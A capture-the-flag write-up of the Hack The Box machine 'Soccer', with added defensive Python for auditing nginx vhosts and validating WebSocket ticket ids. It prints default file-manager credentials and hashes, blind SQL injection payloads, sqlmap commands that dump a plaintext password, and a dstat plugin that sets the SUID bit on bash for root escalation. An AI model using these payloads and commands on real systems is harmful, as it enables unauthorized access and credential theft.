Soccer
Recon
Ports
sudo nmap -sT -sC -sV -p22,80,9091 10.129.109.253
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-16 11:20 CST
Nmap scan report for 10.129.109.253
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
| 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
|_ 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Mon, 16 Jun 2025 03:20:31 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Mon, 16 Jun 2025 03:20:31 GMT
| Connection: close
| <!DOCTYPE html>
.....
Enum
Direnum
Directory scan results for ports 80 and 9091:
feroxbuster -u http://soccer.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://soccer.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 494l 1440w 96128c http://soccer.htb/ground3.jpg
200 GET 2232l 4070w 223875c http://soccer.htb/ground4.jpg
200 GET 711l 4253w 403502c http://soccer.htb/ground2.jpg
200 GET 809l 5093w 490253c http://soccer.htb/ground1.jpg
200 GET 147l 526w 6917c http://soccer.htb/
301 GET 7l 12w 178c http://soccer.htb/tiny => http://soccer.htb/tiny/
301 GET 7l 12w 178c http://soccer.htb/tiny/uploads => http://soccer.htb/tiny/uploads/
[####################] - 2m 90021/90021 0s found:7 errors:0
[####################] - 73s 30000/30000 413/s http://soccer.htb/
[####################] - 72s 30000/30000 415/s http://soccer.htb/tiny/
[####################] - 72s 30000/30000 416/s http://soccer.htb/tiny/uploads/
feroxbuster -u http://soccer.htb:9091/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://soccer.htb:9091/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 10l 15w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
[####################] - 76s 30000/30000 0s found:0 errors:0
[####################] - 75s 30000/30000 398/s http://soccer.htb:9091/
A tiny subdirectory exists.
vhost enum
ffuf -u http://soccer.htb/ -H "Host: FUZZ.soccer.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://soccer.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
:: Header : Host: FUZZ.soccer.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
ffuf -u http://soccer.htb:9091/ -H "Host: FUZZ.soccer.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://soccer.htb:9091/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
:: Header : Host: FUZZ.soccer.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
Neither scan found any subdomains. Visiting port 80:
Soccer
Home
HTB FootBall Club
"We Love Soccer"
Due to the scope and popularity of the sport, professional football clubs carry a significant commercial existence, with fans expecting personal service and interactivity, and stakeholders viewing the field of professional football as a source of significant business
advantages. For this reason, expensive player transfers have become an expectable part of the sport. Awards are also handed out to managers or coaches on a yearly basis for excellent performances. The designs, logos and names of professional football clubs are often
licensed trademarks. The difference between a football team and a (professional) football club is incorporation, a football club is an entity which is formed and governed by a committee and has members which may consist of supporters in addition to players.
Latest News
admin
Get updates on the latest World Cup action and find articles, videos, commentary and analysis in one place.
admin
The FIFA World Cup Qatar 2022 will be played from 20 November to 18 December.
admin
Soccer is the most popular game in the world. In many countries it is known as “football”.
admin
FIFA World Cup is the most popular soccer tournament that is followed by billions of people around the world on their Television so I wanted to take some time and make this web page dedicated to World Cup Soccer Facts only.
Visiting port 9091: the service on this port exposes no special directories or endpoints; set it aside for later.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /</pre>
</body>
</html>
Exploit
Visiting http://soccer.htb/tiny requires a login; the default credentials (admin:admin@123) work. Because of HTB caching/loading problems the page loads very slowly, so it was opened with w3m, which renders as follows:
Create New Item
×
Item Type
( ) File
(*) Folder
Item Name
[ ]
Cancel Create Now
[ ]
×
Search file in folder and subfolders...
File Manager
• [ ]
Advanced Search
• Upload
• New Item
• admin
Settings Help Sign Out
[ ] Name Size Modified Perms Owner Actions
[ ] tiny Folder 17.11.22 08:07 0755 root:root
[ ] football.jpg 376.23 KB 17.11.22 08:07 0644 root:root
[ ] ground1.jpg 264.68 KB 17.11.22 08:07 0644 root:root
[ ] ground2.jpg 218.5 KB 17.11.22 08:07 0644 root:root
[ ] ground3.jpg 55.05 KB 17.11.22 08:07 0644 root:root
[ ] ground4.jpg 121.57 KB 17.11.22 08:07 0644 root:root
[ ] index.html 6.75 KB 17.11.22 08:07 0644 root:root
Full Size: 1.02 MB File: 6 Folder: 1 Memory used: 2 MB Partition size: 1.09 GB free of 3.84 GB
• Select all
• Unselect all
• Invert Selection
• [Delete] Delete
• [zip] Zip
• [tar] Tar
• [Copy] Copy
**Tiny File Manager 2.4.3**
The file /var/www/html/tiny/tinyfilemanager.php contains credential information:
$auth_users = array(
'admin' => '$2y$10$/K.hjNr84lLNDt8fTXjoI.DBp6PpeyoJ.mGwrrLuCZfAwfSAGqhOW', //admin@123
'user' => '$2y$10$Fg6Dz8oH9fPoZ2jJan5tZuv6Z4Kp7avtQ9bDfrdRntXtPeiMAZyGO' //12345
);
Tiny File Manager is version 2.4.3. A search for known vulnerabilities shows an upload RCE: a shell file can be uploaded into the uploads folder (the other folders lack sufficient permissions), and requesting it yields a reverse shell.
Shell as www-data
No sensitive information or files were found in the usual directories or in the user home directories, and there was no usable privilege-escalation path there. The listening ports are shown below: 3000, 3306 and 33060 are open.
www-data@soccer:/etc/nginx/sites-available$ ss -antlp
ss -antlp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 511 0.0.0.0:9091 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=1029,fd=6),("nginx",pid=1028,fd=6))
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 511 127.0.0.1:3000 0.0.0.0:*
LISTEN 0 511 [::]:80 [::]:* users:(("nginx",pid=1029,fd=7),("nginx",pid=1028,fd=7))
LISTEN 0 128 [::]:22 [::]:*
3306 and 33060 are MySQL ports; attempts using the information already gathered and weak passwords did not gain access.
www-data@soccer:/$ mysql -p 3306
Enter password: ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: YES)
www-data@soccer:/$ mysql -p 33060
Enter password: ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: YES)
However, the nginx configuration files reveal a subdomain, soc-player.
www-data@soccer:/etc/nginx/sites-available$ cat soc
cat soc-player.htb
server {
listen 80;
listen [::]:80;
server_name soc-player.soccer.htb;
root /root/app/views;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
Visiting soc-player.soccer.htb shows a few more sections than the original page: Match, Login and Signup.
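The lesson of this step is that a name-based vhost is only "hidden" until someone reads the nginx config or brute-forces Host headers, so it belongs in the asset inventory like any other site. The following is an added example in Python (not from the writeup and not the box's own tooling) that walks nginx `server` blocks and pulls out the names, document roots and upstreams a defender should track; the sample input is the soc-player config from the page, and the review heuristics are my own.

```python
import re

# Sample input: the soc-player vhost exactly as shown on the page.
SAMPLE_CONFIG = """\
server {
listen 80;
listen [::]:80;
server_name soc-player.soccer.htb;
root /root/app/views;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
"""

# Only the directives that matter for an inventory; values run up to the ';'.
DIRECTIVE_RE = re.compile(r"^(server_name|root|proxy_pass|listen)\s+([^;]+);")


def extract_vhosts(config_text):
    """Split the config into top-level `server { ... }` blocks by tracking brace
    depth, and collect listen/server_name/root/proxy_pass from each block
    (directives inside nested location blocks are attributed to the vhost)."""
    vhosts = []
    depth = 0
    current = None
    for line in config_text.splitlines():
        stripped = line.strip()
        if depth == 0 and re.match(r"^server\s*\{", stripped):
            current = {"server_name": [], "listen": [], "root": None, "proxy_pass": []}
            depth = 1
            continue
        if current is None:
            continue
        depth += stripped.count("{") - stripped.count("}")
        m = DIRECTIVE_RE.match(stripped)
        if m:
            key, val = m.group(1), m.group(2).strip()
            if key == "server_name":
                current["server_name"].extend(val.split())
            elif key == "listen":
                current["listen"].append(val)
            elif key == "root":
                current["root"] = val
            elif key == "proxy_pass":
                current["proxy_pass"].append(val)
        if depth == 0:
            vhosts.append(current)
            current = None
    return vhosts


def review_vhost(vhost):
    """Inventory-style findings for one vhost (heuristics chosen for this example)."""
    findings = []
    names = ", ".join(vhost["server_name"]) or "(no server_name)"
    root = vhost["root"]
    if root and (root == "/root" or root.startswith("/root/")):
        findings.append(f"{names}: root directive {root} serves files from root's home directory")
    for target in vhost["proxy_pass"]:
        findings.append(
            f"{names}: name-based vhost fronting {target}; reachable by anyone who sends "
            "the matching Host header, so it must appear in the external asset inventory"
        )
    return findings


if __name__ == "__main__":
    for vh in extract_vhosts(SAMPLE_CONFIG):
        print(vh)
        for finding in review_vhost(vh):
            print(" -", finding)
```

Point it at the concatenation of `/etc/nginx/sites-enabled/*` on a real host; anything with a `server_name` that is not in the DNS/asset inventory is the kind of forgotten vhost this box relies on.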
Soccer
Home
Home
Match
Login
Signup
HTB FootBall Club
"We Love Soccer"
(The page body and the Latest News section are identical to the soccer.htb page shown above.)
Create an account and log in.
Soccer
Home
Match
Tickets
Logout
Your Ticket Id: 88561
[ ]
10 days remaining for the match.
Price
Free
** Please don't forget your ticket number. **
The input box under the check subdirectory looks up a Ticket Id and returns the field Ticket Exists. Testing the endpoint, the two responses Ticket Exists and Ticket Doesn't Exist reveal a boolean-based blind SQL injection. Test payloads:
{"id":"0 and 1=1"}
Ticket Exists
{"id":"0 and 1=2"}
Ticket Doesn't Exist
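The two payloads above work because the id is dropped into the query as text and the server answers with one of two distinguishable strings. As an added example (Python; not code from the writeup or from the box's application, whose backend is not shown), the strict parse the server should apply to the `{"id": ...}` frame, placed beside the concatenation pattern the payloads exploit, plus the same validator used as a detection filter over constructed sample WebSocket log lines. The table and column names follow the `accounts` table dumped later on the page; the query shape and log format are assumptions.

```python
import json
import re

# Constructed sample log: "<client> <raw WebSocket frame>", one frame per line.
# Client addresses are made up; the frames mirror the page's probes.
SAMPLE_WS_LOG = """\
10.10.14.5 {"id":"88561"}
10.10.14.5 {"id":"0 and 1=1"}
10.10.14.5 {"id":"0 and 1=2"}
10.10.14.9 {"id":"1324"}
10.10.14.5 {"id":"-2861 OR 1945=1945"}
"""

# A ticket id is a short decimal number and nothing else.
TICKET_ID_RE = re.compile(r"\d{1,10}")


def parse_ticket_id(raw_frame):
    """Return the ticket id as an int, or raise ValueError for anything that is
    not a plain non-negative decimal (JSON number or digit string)."""
    try:
        data = json.loads(raw_frame)
    except json.JSONDecodeError as exc:
        raise ValueError("frame is not valid JSON") from exc
    if not isinstance(data, dict) or "id" not in data:
        raise ValueError("frame has no id")
    value = data["id"]
    if isinstance(value, bool):           # bool is an int subclass; reject it explicitly
        raise ValueError("id must be a number")
    if isinstance(value, int):
        if value < 0:
            raise ValueError("id must be non-negative")
        return value
    if isinstance(value, str) and TICKET_ID_RE.fullmatch(value.strip()):
        return int(value)
    raise ValueError("id must be a decimal ticket number")


def is_valid_frame(raw_frame):
    try:
        parse_ticket_id(raw_frame)
        return True
    except ValueError:
        return False


def build_query_unsafe(raw_id):
    """The anti-pattern: the attacker-controlled text becomes part of the SQL,
    which is exactly why '0 and 1=1' and '0 and 1=2' answer differently."""
    return f"SELECT id FROM accounts WHERE id = {raw_id}"


def build_query_safe(raw_frame):
    """Validated value passed as a bound parameter (MySQL driver placeholder style)."""
    ticket_id = parse_ticket_id(raw_frame)
    return "SELECT id FROM accounts WHERE id = %s", (ticket_id,)


def find_probes(log_text):
    """Detection view: every frame whose id fails strict validation, with its client."""
    probes = []
    for line in log_text.splitlines():
        client, _, frame = line.partition(" ")
        if frame and not is_valid_frame(frame):
            probes.append((client, frame))
    return probes


if __name__ == "__main__":
    print(build_query_unsafe("0 and 1=1"))
    print(build_query_safe('{"id":"88561"}'))
    for client, frame in find_probes(SAMPLE_WS_LOG):
        print("probe from", client, ":", frame)
```

With the strict parser in place the probes never reach the database, and feeding rejected frames into the application log gives the SOC a clean signal: a single client producing many rejects in a short window is the signature of blind enumeration such as the sqlmap run shown next.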
Capturing the traffic in Burp Suite shows that this is the WebSocket protocol. After installing the python3-websockets package (on Kali), sqlmap supports SQL injection testing over ws. Details:
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id":"0 or 1=2"}' --dbms mysql --batch --level 5 --risk 3
___
__H__
___ ___[)]_____ ___ ___ {1.9.4#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:04:06 /2025-06-16/
...[snap]...
[15:04:11] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'JSON id' might not be injectable
[15:04:12] [INFO] testing for SQL injection on (custom) POST parameter 'JSON id'
[15:04:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:04:37] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:04:46] [INFO] (custom) POST parameter 'JSON id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[15:07:10] [INFO] checking if the injection point on (custom) POST parameter 'JSON id' is a false positive
(custom) POST parameter 'JSON id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
...[snap]...
sqlmap identified the following injection point(s) with a total of 374 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-2861 OR 1945=1945"}
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: {"id":"0 or 1=2 OR (SELECT 7447 FROM (SELECT(SLEEP(5)))lwUv)"}
---
[15:07:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
Dump the usernames and passwords.
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id":"0 or 1=2"}' --dbms mysql --batch --level 5 --risk 3 --dbs
[15:11:30] [INFO] retrieved: soccer_db
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id":"0 or 1=2"}' --dbms mysql --batch --level 5 --risk 3 -D soccer_db -T accounts
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+
Shell as user: player
Gathering privilege-escalation information reveals doas. doas is a minimal privilege-elevation tool, similar to sudo but designed to be lighter and safer; its configuration file doas.conf spells out exactly which permissions are granted.
-bash-5.0$ find / -perm -04000 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/bash
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign
-bash-5.0$
doas.conf contents:
-bash-5.0$ find -name doas.conf -type f 2>/dev/null
-bash-5.0$ find / -name doas.conf -type f 2>/dev/null
/usr/local/etc/doas.conf
-bash-5.0$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
-bash-5.0$
User player can run /usr/bin/dstat with nopass. Following GTFOBins, create a plugin script in /usr/local/share/dstat/ (/usr/share/dstat/ is not writable, insufficient permissions; ~/.dstat/ does not work either, because the script runs as root, so ~ resolves to root's home directory).
```bash
player@soccer:/usr/local/share/dstat$ echo -e "import os;\nos.system('chmod u+s /bin/bash')" > /usr/local/share/dstat/dstat_exp.py
player@soccer:/usr/local/share/dstat$ which dstat
/usr/bin/dstat
player@soccer:/usr/local/share/dstat$ doas -u root /usr/bin/dstat --exp
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
Module dstat_exp failed to load. (name 'dstat_plugin' is not defined)
None of the stats you selected are available.
player@soccer:/usr/local/share/dstat$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
player@soccer:/usr/local/share/dstat$ /bin/bash -p
bash-5.0# exit
exit
```
Summary
Overall path through the box: directory scan --> Tiny File Manager --> upload RCE --> internal enumeration --> hidden subdomain from the nginx configuration --> SQL injection in the endpoint --> dump the database for user credentials --> SSH login --> find SUID --> dstat privilege escalation.
This is rated a medium box, but in practice it is somewhat harder: after getting the web shell you still have to find the hidden subdomain (in the nginx configuration files, which is easy to forget). That is the detour. Once the subdomain is found, testing the endpoint shows a SQL injection that is easy to detect, and sqlmap does the enumeration. From the user shell, the SUID doas binary is found, and its configuration file gives the privilege-escalation path via dstat. Very interesting.